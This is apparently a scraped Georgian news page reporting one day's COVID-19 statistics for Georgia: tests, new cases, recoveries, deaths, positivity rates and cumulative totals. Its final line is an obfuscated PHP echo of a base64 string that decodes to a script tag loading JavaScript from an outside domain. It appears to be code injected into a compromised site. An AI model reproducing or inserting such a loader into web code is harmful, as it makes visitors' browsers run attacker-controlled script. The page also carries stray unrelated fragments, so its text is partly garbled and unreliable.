celsiusi
ავერსი საქკაბელი
მთავრობის სპეციალურ ვებგვრდზე,  stopcov.ge-ზე განთავსებული ინფორმაციის მიხედვით, ბოლო 24 საათში ქვეყანაში ჩატარდა 7 476 ტესტი და კორონავირუსის 509 ახალი შემთხვევა გამოვლინდა.
 
მათივე ცნობით, ქვეყანაში ბოლო 24 საათში 1 200 ადამიანი გამოჯანმრთელდა. ბოლო დღე-ღამეში კორონავირუსით გარდაიცვალა 12 პაციენტი.
 
ბოლო 24 საათში სულ ქვეყანაში ჩატარდა 7 476 ტესტი, მათ შორის ანტიგენის სწრაფი ტესტით – 3 111, „პისიარ“ ტესტით – 4 365. 
 
ქვეყანაში კორონავირუსის გამოვლენის დადებითობის მაჩვენებლებია: დღიური – 6,81%, ბოლო 14 დღის – 5%, ბოლო 7 დღის – 5,6%.
 
საქართველოში კორონავირუსით ინფიცირების სულ 312 954 შემთხვევაა გამოვლენილი, მათგან 294 252  გამოჯანმრთელდა, 4 163 კი, გარდაიცვალა.
კარანტინის რეჟიმშია 89, სტაციონარში მეთვალყურეობას 4 114 ადამიანი გადის, კლინიკურ სასტუმროში იმყოფება 790 პირი.
 
ამასთან, 2 მაისის მდგომარეობით, საქართველოში კორონავირუსის 988 ახალი შემთხვევა გამოვლინდა, გამოჯანმრთელდა 1 595 პაციენტი.
 
 
 
1099
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");